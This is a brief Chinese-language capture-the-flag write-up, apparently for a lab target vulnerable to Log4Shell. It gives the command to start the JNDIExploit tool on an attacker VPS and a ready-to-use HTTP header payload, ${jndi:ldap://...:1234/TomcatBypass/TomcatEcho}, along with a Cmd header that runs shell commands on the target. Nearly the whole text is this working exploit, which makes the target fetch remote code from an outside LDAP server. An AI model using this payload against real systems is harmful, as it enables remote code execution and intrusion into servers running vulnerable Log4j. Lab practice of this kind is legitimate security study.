开启靶机环境并访问
使用JNDIExploit-1.2-SNAPSHOT在自己的vps上开启服务
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i xx.xx.xx.xx-l 1234 -p 2345
抓包填写payload,获得flag
X-Api-Version:${jndi:ldap://xx.xx.xx.xx:1234/TomcatBypass/TomcatEcho}
Content-Type:application/x-www-from-urlencoded
Cmd:ls /tmp
若有收获,就点个赞吧